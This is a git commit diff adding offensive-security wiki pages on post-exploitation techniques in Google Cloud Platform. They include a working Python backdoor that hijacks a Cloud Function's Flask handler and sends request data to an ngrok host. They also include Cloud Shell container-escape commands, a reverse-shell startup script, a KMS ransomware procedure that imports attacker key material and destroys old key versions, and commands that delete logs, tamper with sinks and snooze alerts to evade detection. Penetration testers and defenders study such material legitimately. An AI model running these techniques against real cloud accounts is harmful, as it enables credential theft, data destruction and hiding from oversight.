Migrate to using mdbook

This commit is contained in:
Congon4tor
2024-12-31 17:04:35 +01:00
parent b9a9fed802
commit cd27cf5a2e
1373 changed files with 26143 additions and 34152 deletions

View File

@@ -0,0 +1,2 @@
# GCP - Post Exploitation

View File

@@ -0,0 +1,43 @@
# GCP - App Engine Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## `App Engine`
For information about App Engine check:
{{#ref}}
../gcp-services/gcp-app-engine-enum.md
{{#endref}}
### `appengine.memcache.addKey` | `appengine.memcache.list` | `appengine.memcache.getKey` | `appengine.memcache.flush`
With these permissions it's possible to:
- Add a key
- List keys
- Get a key
- Delete
> [!CAUTION]
> However, I **couldn't find any way to access this information from the cli**, only from the **web console** where you need to know the **Key type** and the **Key name**, of from the a**pp engine running app**.
>
> If you know easier ways to use these permissions send a Pull Request!
### `logging.views.access`
With this permission it's possible to **see the logs of the App**:
```bash
gcloud app logs tail -s <name>
```
### Read Source Code
The source code of all the versions and services are **stored in the bucket** with the name **`staging.<proj-id>.appspot.com`**. If you have write access over it you can read the source code and search for **vulnerabilities** and **sensitive information**.
### Modify Source Code
Modify source code to steal credentials if they are being sent or perform a defacement web attack.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,21 @@
# GCP - Artifact Registry Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Artifact Registry
For more information about Artifact Registry check:
{{#ref}}
../gcp-services/gcp-artifact-registry-enum.md
{{#endref}}
### Privesc
The Post Exploitation and Privesc techniques of Artifact Registry were mixed in:
{{#ref}}
../gcp-privilege-escalation/gcp-artifact-registry-privesc.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,29 @@
# GCP - Cloud Build Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Cloud Build
For more information about Cloud Build check:
{{#ref}}
../gcp-services/gcp-cloud-build-enum.md
{{#endref}}
### `cloudbuild.builds.approve`
With this permission you can approve the execution of a **codebuild that require approvals**.
```bash
# Check the REST API in https://cloud.google.com/build/docs/api/reference/rest/v1/projects.locations.builds/approve
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
-d '{{
"approvalResult": {
object (ApprovalResult)
}}' \
"https://cloudbuild.googleapis.com/v1/projects/<PROJECT_ID>/locations/<LOCATION>/builds/<BUILD_ID>:approve"
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,128 @@
# GCP - Cloud Functions Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Cloud Functions
Find some information about Cloud Functions in:
{{#ref}}
../gcp-services/gcp-cloud-functions-enum.md
{{#endref}}
### `cloudfunctions.functions.sourceCodeGet`
With this permission you can get a **signed URL to be able to download the source code** of the Cloud Function:
```bash
curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions/{function-name}:generateDownloadUrl \
-H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
-H "Content-Type: application/json" \
-d '{}'
```
### Steal Cloud Function Requests
If the Cloud Function is managing sensitive information that users are sending (e.g. passwords or tokens), with enough privileges you could **modify the source code of the function and exfiltrate** this information.
Moreover, Cloud Functions running in python use **flask** to expose the web server, if you somehow find a code injection vulnerability inside the flaks process (a SSTI vulnerability for example), it's possible to **override the function handler** that is going to receive the HTTP requests for a **malicious function** that can **exfiltrate the request** before passing it to the legit handler.
For example this code implements the attack:
```python
import functions_framework
# Some python handler code
@functions_framework.http
def hello_http(request, last=False, error=""):
"""HTTP Cloud Function.
Args:
request (flask.Request): The request object.
<https://flask.palletsprojects.com/en/1.1.x/api/#incoming-request-data>
Returns:
The response text, or any set of values that can be turned into a
Response object using `make_response`
<https://flask.palletsprojects.com/en/1.1.x/api/#flask.make_response>.
"""
if not last:
return injection()
else:
if error:
return error
else:
return "Hello World!"
# Attacker code to inject
# Code based on the one from https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py
new_function = """
def exfiltrate(request):
try:
from urllib import request as urllib_request
req = urllib_request.Request("https://8b01-81-33-67-85.ngrok-free.app", data=bytes(str(request._get_current_object().get_data()), "utf-8"), method="POST")
urllib_request.urlopen(req, timeout=0.1)
except Exception as e:
if not "read operation timed out" in str(e):
return str(e)
return ""
def new_http_view_func_wrapper(function, request):
def view_func(path):
try:
error = exfiltrate(request)
return function(request._get_current_object(), last=True, error=error)
except Exception as e:
return str(e)
return view_func
"""
def injection():
global new_function
try:
from flask import current_app as app
import flask
import os
import importlib
import sys
if os.access('/tmp', os.W_OK):
new_function_path = "/tmp/function.py"
with open(new_function_path, "w") as f:
f.write(new_function)
os.chmod(new_function_path, 0o777)
if not os.path.exists('/tmp/function.py'):
return "/tmp/function.py doesn't exists"
# Get relevant function names
handler_fname = os.environ.get("FUNCTION_TARGET") # Cloud Function env variable indicating the name of the function to habdle requests
source_path = os.environ.get("FUNCTION_SOURCE", "./main.py") # Path to the source file of the Cloud Function (./main.py by default)
realpath = os.path.realpath(source_path) # Get full path
# Get the modules representations
spec_handler = importlib.util.spec_from_file_location("main_handler", realpath)
module_handler = importlib.util.module_from_spec(spec_handler)
spec_backdoor = importlib.util.spec_from_file_location('backdoor', '/tmp/function.py')
module_backdoor = importlib.util.module_from_spec(spec_backdoor)
# Load the modules inside the app context
with app.app_context():
spec_handler.loader.exec_module(module_handler)
spec_backdoor.loader.exec_module(module_backdoor)
# make the cloud funtion use as handler the new function
prev_handler = getattr(module_handler, handler_fname)
new_func_wrap = getattr(module_backdoor, 'new_http_view_func_wrapper')
app.view_functions["run"] = new_func_wrap(prev_handler, flask.request)
return "Injection completed!"
except Exception as e:
return str(e)
```

View File

@@ -0,0 +1,23 @@
# GCP - Cloud Run Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Cloud Run
For more information about Cloud Run check:
{{#ref}}
../gcp-services/gcp-cloud-run-enum.md
{{#endref}}
### Access the images
If you can access the container images check the code for vulnerabilities and hardcoded sensitive information. Also for sensitive information in env variables.
If the images are stored in repos inside the service Artifact Registry and the user has read access over the repos, he could also download the image from this service.
### Modify & redeploy the image
Modify the run image to steal information and redeploy the new version (just uploading a new docker container with the same tags won't get it executed). For example, if it's exposing a login page, steal the credentials users are sending.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,102 @@
# GCP - Cloud Shell Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Cloud Shell
For more information about Cloud Shell check:
{{#ref}}
../gcp-services/gcp-cloud-shell-enum.md
{{#endref}}
### Container Escape
Note that the Google Cloud Shell runs inside a container, you can **easily escape to the host** by doing:
```bash
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
```
This is not considered a vulnerability by google, but it gives you a wider vision of what is happening in that env.
Moreover, notice that from the host you can find a service account token:
```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
```
With the following scopes:
```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
```
Enumerate metadata with LinPEAS:
```bash
cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud
```
After using [https://github.com/carlospolop/bf_my_gcp_permissions](https://github.com/carlospolop/bf_my_gcp_permissions) with the token of the Service Account **no permission was discovered**...
### Use it as Proxy
If you want to use your google cloud shell instance as proxy you need to run the following commands (or insert them in the .bashrc file):
```bash
sudo apt install -y squid
```
Just for let you know Squid is a http proxy server. Create a **squid.conf** file with the following settings:
```bash
http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all
```
copy the **squid.conf** file to **/etc/squid**
```bash
sudo cp squid.conf /etc/squid
```
Finally run the squid service:
```bash
sudo service squid start
```
Use ngrok to let the proxy be available from outside:
```bash
./ngrok tcp 3128
```
After running copy the tcp:// url. If you want to run the proxy from a browser it is suggested to remove the tcp:// part and the port and put the port in the port field of your browser proxy settings (squid is a http proxy server).
For better use at startup the .bashrc file should have the following lines:
```bash
sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128
```
The instructions were copied from [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Check that page for other crazy ideas to run any kind of software (databases and even windows) in Cloud Shell.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,103 @@
# GCP - Cloud SQL Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Cloud SQL
For more information about Cloud SQL check:
{{#ref}}
../gcp-services/gcp-cloud-sql-enum.md
{{#endref}}
### `cloudsql.instances.update`, ( `cloudsql.instances.get`)
To connect to the databases you **just need access to the database port** and know the **username** and **password**, there isn't any IAM requirements. So, an easy way to get access, supposing that the database has a public IP address, is to update the allowed networks and **allow your own IP address to access it**.
```bash
# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
--authorized-networks "$(curl ifconfig.me)" \
--assign-ip \
--quiet
mysql -h <ip_db> # If mysql
# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet
```
It's also possible to use **`--no-backup`** to **disrupt the backups** of the database.
As these are the requirements I'm not completely sure what are the permissions **`cloudsql.instances.connect`** and **`cloudsql.instances.login`** for. If you know it send a PR!
### `cloudsql.users.list`
Get a **list of all the users** of the database:
```bash
gcloud sql users list --instance <intance-name>
```
### `cloudsql.users.create`
This permission allows to **create a new user inside** the database:
```bash
gcloud sql users create <username> --instance <instance-name> --password <password>
```
### `cloudsql.users.update`
This permission allows to **update user inside** the database. For example, you could change its password:
```bash
gcloud sql users set-password <username> --instance <instance-name> --password <password>
```
### `cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`
Backups might contain **old sensitive information**, so it's interesting to check them.\
**Restore a backup** inside a database:
```bash
gcloud sql backups restore <backup-id> --restore-instance <instance-id>
```
To do it in a more stealth way it's recommended to create a new SQL instance and recover the data there instead of in the currently running databases.
### `cloudsql.backupRuns.delete`
This permission allow to delete backups:
```bash
gcloud sql backups delete <backup-id> --instance <instance-id>
```
### `cloudsql.instances.export`, `storage.objects.create`
**Export a database** to a Cloud Storage Bucket so you can access it from there:
```bash
# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>
```
### `cloudsql.instances.import`, `storage.objects.get`
**Import a database** (overwrite) from a Cloud Storage Bucket:
```bash
# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>
```
### `cloudsql.databases.delete`
Delete a database from the db instance:
```bash
gcloud sql databases delete <db-name> --instance <instance-id>
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,120 @@
# GCP - Compute Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Compute
For more information about Compute and VPC (Networking) check:
{{#ref}}
../gcp-services/gcp-compute-instances-enum/
{{#endref}}
### Export & Inspect Images locally
This would allow an attacker to **access the data contained inside already existing images** or **create new images of running VMs** and access their data without having access to the running VM.
It's possible to export a VM image to a bucket and then download it and mount it locally with the command:
```bash
gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# The download the export from the bucket and mount it locally
```
Fore performing this action the attacker might need privileges over the storage bucket and for sure **privileges over cloudbuild** as it's the **service** which is going to be asked to perform the export\
Moreover, for this to work the codebuild SA and the compute SA needs privileged permissions.\
The cloudbuild SA `<project-id>@cloudbuild.gserviceaccount.com` needs:
- roles/iam.serviceAccountTokenCreator
- roles/compute.admin
- roles/iam.serviceAccountUser
And the SA `<project-id>-compute@developer.gserviceaccount.com` needs:
- oles/compute.storageAdmin
- roles/storage.objectAdmin
### Export & Inspect Snapshots & Disks locally
It's not possible to directly export snapshots and disks, but it's possible to **transform a snapshot in a disk, a disk in an image** and following the **previous section**, export that image to inspect it locally
```bash
# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]
# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]
```
### Inspect an Image creating a VM
With the goal of accessing the **data stored in an image** or inside a **running VM** from where an attacker **has created an image,** it possible to grant an external account access over the image:
```bash
gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'
```
and then create a new VM from it:
```bash
gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]
```
If you could not give your external account access over image, you could launch a VM using that image in the victims project and **make the metadata execute a reverse shell** to access the image adding the param:
```bash
--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'
```
### Inspect a Snapshot/Disk attaching it to a VM
With the goal of accessing the **data stored in a disk or a snapshot, you could transform the snapshot into a disk, a disk into an image and follow th preivous steps.**
Or you could **grant an external account access** over the disk (if the starting point is a snapshot give access over the snapshot or create a disk from it):
```bash
gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'
```
**Attach the disk** to an instance:
```bash
gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]
```
Mount the disk inside the VM:
1. **SSH into the VM**:
```sh
gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]
```
2. **Identify the Disk**: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as `/dev/sdb`, `/dev/sdc`, etc.
3. **Format and Mount the Disk** (if it's a new or raw disk):
- Create a mount point:
```sh
sudo mkdir -p /mnt/disks/[MOUNT_DIR]
```
- Mount the disk:
```sh
sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
```
If you **cannot give access to a external project** to the snapshot or disk, you might need to p**erform these actions inside an instance in the same project as the snapshot/disk**.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,100 @@
# GCP - Filestore Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Filestore
For more information about Filestore check:
{{#ref}}
../gcp-services/gcp-filestore-enum.md
{{#endref}}
### Mount Filestore
A shared filesystem **might contain sensitive information** interesting from an attackers perspective. With access to the Filestore it's possible to **mount it**:
```bash
sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
```
To find the IP address of a filestore insatnce check the enumeration section of the page:
{{#ref}}
../gcp-services/gcp-filestore-enum.md
{{#endref}}
### Remove Restrictions and get extra permissions
If the attacker isn't in an IP address with access over the share, but you have enough permissions to modify it, it's possible to remover the restrictions or access over it. It's also possible to grant more privileges over your IP address to have admin access over the share:
```bash
gcloud filestore instances update nfstest \
--zone=<exact-zone> \
--flags-file=nfs.json
# Contents of nfs.json
{
"--file-share":
{
"capacity": "1024",
"name": "<share-name>",
"nfs-export-options": [
{
"access-mode": "READ_WRITE",
"ip-ranges": [
"<your-ip-private-address>/32"
],
"squash-mode": "NO_ROOT_SQUASH",
"anon_uid": 1003,
"anon_gid": 1003
}
]
}
}
```
### Restore a backup
If there is a backup it's possible to **restore it** in an existing or in a new instance so its **information becomes accessible:**
```bash
# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29
# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>
# Follow the previous section commands to mount it
```
### Create a backup and restore it
If you **don't have access over a share and don't want to modify it**, it's possible to **create a backup** of it and **restore** it as previously mentioned:
```bash
# Create share backup
gcloud filestore backups create <back-name> \
--region=<region> \
--instance=<instance-name> \
--instance-zone=<instance-zone> \
--file-share=<share-name>
# Follow the previous section commands to restore it and mount it
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,29 @@
# GCP - IAM Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## IAM <a href="#service-account-impersonation" id="service-account-impersonation"></a>
You can find further information about IAM in:
{{#ref}}
../gcp-services/gcp-iam-and-org-policies-enum.md
{{#endref}}
### Granting access to management console <a href="#granting-access-to-management-console" id="granting-access-to-management-console"></a>
Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**.
To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. `gcloud` will error out if you try to grant it a permission above Editor.
You can use the following command to **grant a user the primitive role of Editor** to your existing project:
```bash
gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor
```
If you succeeded here, try **accessing the web interface** and exploring from there.
This is the **highest level you can assign using the gcloud tool**.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,257 @@
# GCP - KMS Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## KMS
Find basic information about KMS in:
{{#ref}}
../gcp-services/gcp-kms-enum.md
{{#endref}}
### `cloudkms.cryptoKeyVersions.destroy`
An attacker with this permission could destroy a KMS version. In order to do this you first need to disable the key and then destroy it:
```python
# pip install google-cloud-kms
from google.cloud import kms
def disable_key_version(project_id, location_id, key_ring_id, key_id, key_version):
"""
Disables a key version in Cloud KMS.
"""
# Create the client.
client = kms.KeyManagementServiceClient()
# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
# Call the API to disable the key version.
client.update_crypto_key_version(request={'crypto_key_version': {'name': key_version_name, 'state': kms.CryptoKeyVersion.State.DISABLED}})
def destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version):
"""
Destroys a key version in Cloud KMS.
"""
# Create the client.
client = kms.KeyManagementServiceClient()
# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
# Call the API to destroy the key version.
client.destroy_crypto_key_version(request={'name': key_version_name})
# Example usage
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
key_version = '1' # Version number to disable and destroy
# Disable the key version
disable_key_version(project_id, location_id, key_ring_id, key_id, key_version)
# Destroy the key version
destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version)
```
### KMS Ransomware
In AWS it's possible to completely **steal a KMS key** by modifying the KMS resource policy and only allowing the attackers account to use the key. As these resource policies doesn't exist in GCP this is not possible.
However, there is another way to perform a global KMS Ransomware, which would involve the following steps:
- Create a new **version of the key with a key material** imported by the attacker
```bash
gcloud kms import-jobs create [IMPORT_JOB] --location [LOCATION] --keyring [KEY_RING] --import-method [IMPORT_METHOD] --protection-level [PROTECTION_LEVEL] --target-key [KEY]
```
- Set it as **default version** (for future data being encrypted)
- **Re-encrypt older data** encrypted with the previous version with the new one.
- **Delete the KMS key**
- Now only the attacker, who has the original key material could be able to decrypt the encrypted data
#### Here are the steps to import a new version and disable/delete the older data:
```bash
# Encrypt something with the original key
echo "This is a sample text to encrypt" > /tmp/my-plaintext-file.txt
gcloud kms encrypt \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--plaintext-file my-plaintext-file.txt \
--ciphertext-file my-encrypted-file.enc
# Decrypt it
gcloud kms decrypt \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--ciphertext-file my-encrypted-file.enc \
--plaintext-file -
# Create an Import Job
gcloud kms import-jobs create my-import-job \
--location us-central1 \
--keyring kms-lab-2-keyring \
--import-method "rsa-oaep-3072-sha1-aes-256" \
--protection-level "software"
# Generate key material
openssl rand -out my-key-material.bin 32
# Import the Key Material (it's encrypted with an asymetrict key of the import job previous to be sent)
gcloud kms keys versions import \
--import-job my-import-job \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--algorithm "google-symmetric-encryption" \
--target-key-file my-key-material.bin
# Get versions
gcloud kms keys versions list \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key
# Make new version primary
gcloud kms keys update \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--primary-version 2
# Try to decrypt again (error)
gcloud kms decrypt \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--ciphertext-file my-encrypted-file.enc \
--plaintext-file -
# Disable initial version
gcloud kms keys versions disable \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key 1
# Destroy the old version
gcloud kms keys versions destroy \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--version 1
```
### `cloudkms.cryptoKeyVersions.useToEncrypt` | `cloudkms.cryptoKeyVersions.useToEncryptViaDelegation`
```python
from google.cloud import kms
import base64
def encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext):
"""
Encrypts data using a symmetric key from Cloud KMS.
"""
# Create the client.
client = kms.KeyManagementServiceClient()
# Build the key name.
key_name = client.crypto_key_path(project_id, location_id, key_ring_id, key_id)
# Convert the plaintext to bytes.
plaintext_bytes = plaintext.encode('utf-8')
# Call the API.
encrypt_response = client.encrypt(request={'name': key_name, 'plaintext': plaintext_bytes})
ciphertext = encrypt_response.ciphertext
# Optional: Encode the ciphertext to base64 for easier handling.
return base64.b64encode(ciphertext)
# Example usage
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
plaintext = 'your-data-to-encrypt'
ciphertext = encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext)
print('Ciphertext:', ciphertext)
```
### `cloudkms.cryptoKeyVersions.useToSign`
```python
import hashlib
from google.cloud import kms
def sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message):
"""
Sign a message using an asymmetric key version from Cloud KMS.
"""
# Create the client.
client = kms.KeyManagementServiceClient()
# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
# Convert the message to bytes and calculate the digest.
message_bytes = message.encode('utf-8')
digest = {'sha256': hashlib.sha256(message_bytes).digest()}
# Call the API to sign the digest.
sign_response = client.asymmetric_sign(name=key_version_name, digest=digest)
return sign_response.signature
# Example usage for signing
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
key_version = '1'
message = 'your-message'
signature = sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message)
print('Signature:', signature)
```
### `cloudkms.cryptoKeyVersions.useToVerify`
```python
from google.cloud import kms
import hashlib
def verify_asymmetric_signature(project_id, location_id, key_ring_id, key_id, key_version, message, signature):
"""
Verify a signature using an asymmetric key version from Cloud KMS.
"""
# Create the client.
client = kms.KeyManagementServiceClient()
# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
# Convert the message to bytes and calculate the digest.
message_bytes = message.encode('utf-8')
digest = {'sha256': hashlib.sha256(message_bytes).digest()}
# Build the verify request and call the API.
verify_response = client.asymmetric_verify(name=key_version_name, digest=digest, signature=signature)
return verify_response.success
# Example usage for verification
verified = verify_asymmetric_signature(project_id, location_id, key_ring_id, key_id, key_version, message, signature)
print('Verified:', verified)
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,133 @@
# GCP - Logging Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
For more information check:
{{#ref}}
../gcp-services/gcp-logging-enum.md
{{#endref}}
For other ways to disrupt monitoring check:
{{#ref}}
gcp-monitoring-post-exploitation.md
{{#endref}}
### Default Logging
**By default you won't get caught just for performing read actions. Fore more info check the Logging Enum section.**
### Add Excepted Principal
In [https://console.cloud.google.com/iam-admin/audit/allservices](https://console.cloud.google.com/iam-admin/audit/allservices) and [https://console.cloud.google.com/iam-admin/audit](https://console.cloud.google.com/iam-admin/audit) is possible to add principals to not generate logs. An attacker could abuse this to prevent being caught.
### Read logs - `logging.logEntries.list`
```bash
# Read logs
gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json
# Everything from a timestamp
gcloud logging read "timestamp >= \"2023-01-01T00:00:00Z\"" --limit=10 --format=json
# Use these options to indicate a different bucket or view to use: --bucket=_Required --view=_Default
```
### `logging.logs.delete`
```bash
# Delete all entries from a log in the _Default log bucket - logging.logs.delete
gcloud logging logs delete <log-name>
```
### Write logs - `logging.logEntries.create`
```bash
# Write a log entry to try to disrupt some system
gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR
```
### `logging.buckets.update`
```bash
# Set retention period to 1 day (_Required has a fixed one of 400days)
gcloud logging buckets update bucketlog --location=<location> --description="New description" --retention-days=1
```
### `logging.buckets.delete`
```bash
# Delete log bucket
gcloud logging buckets delete BUCKET_NAME --location=<location>
```
### `logging.links.delete`
```bash
# Delete link
gcloud logging links delete <link-id> --bucket <bucket> --location <location>
```
### `logging.views.delete`
```bash
# Delete a logging view to remove access to anyone using it
gcloud logging views delete <view-id> --bucket=<bucket> --location=global
```
### `logging.views.update`
```bash
# Update a logging view to hide data
gcloud logging views update <view-id> --log-filter="resource.type=gce_instance" --bucket=<bucket> --location=global --description="New description for the log view"
```
### `logging.logMetrics.update`
```bash
# Update log based metrics - logging.logMetrics.update
gcloud logging metrics update <metric-name> --description="Changed metric description" --log-filter="severity>CRITICAL" --project=PROJECT_ID
```
### `logging.logMetrics.delete`
```bash
# Delete log based metrics - logging.logMetrics.delete
gcloud logging metrics delete <metric-name>
```
### `logging.sinks.delete`
```bash
# Delete sink - logging.sinks.delete
gcloud logging sinks delete <sink-name>
```
### `logging.sinks.update`
```bash
# Disable sink - logging.sinks.update
gcloud logging sinks update <sink-name> --disabled
# Createa filter to exclude attackers logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --add-exclusion="name=exclude-info-logs,filter=severity<INFO"
# Change where the sink is storing the data - logging.sinks.update
gcloud logging sinks update <sink-name> new-destination
# Change the service account to one withuot permissions to write in the destination - logging.sinks.update
gcloud logging sinks update SINK_NAME --custom-writer-identity=attacker-service-account-email --project=PROJECT_ID
# Remove explusions to try to overload with logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --clear-exclusions
# If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables, potentially leading to inefficient querying and higher costs. - logging.sinks.update
gcloud logging sinks update SINK_NAME --use-partitioned-tables
gcloud logging sinks update SINK_NAME --no-use-partitioned-tables
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,114 @@
# GCP - Monitoring Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Monitoring
Fore more information check:
{{#ref}}
../gcp-services/gcp-monitoring-enum.md
{{#endref}}
For other ways to disrupt logs check:
{{#ref}}
gcp-logging-post-exploitation.md
{{#endref}}
### `monitoring.alertPolicies.delete`
Delete an alert policy:
```bash
gcloud alpha monitoring policies delete <policy>
```
### `monitoring.alertPolicies.update`
Disrupt an alert policy:
```bash
# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled
# Remove all notification channels
gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels
# Chnage notification channels
gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL
# Modify alert conditions
gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
# or use --policy-from-file <policy-file>
```
### `monitoring.dashboards.update`
Modify a dashboard to disrupt it:
```bash
# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
widgets:
- text:
content: Hello World
'''
```
### `monitoring.dashboards.delete`
Delete a dashboard:
```bash
# Delete dashboard
gcloud monitoring dashboards delete <dashboard>
```
### `monitoring.snoozes.create`
Prevent policies from generating alerts by creating a snoozer:
```bash
# Stop alerts by creating a snoozer
gcloud monitoring snoozes create --display-name="Maintenance Week" \
--criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
--start-time="2023-03-01T03:00:00.0-0500" \
--end-time="2023-03-07T23:59:59.5-0500"
```
### `monitoring.snoozes.update`
Update the timing of a snoozer to prevent alerts from being created when the attacker is interested:
```bash
# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME
# odify everything, including affected policies
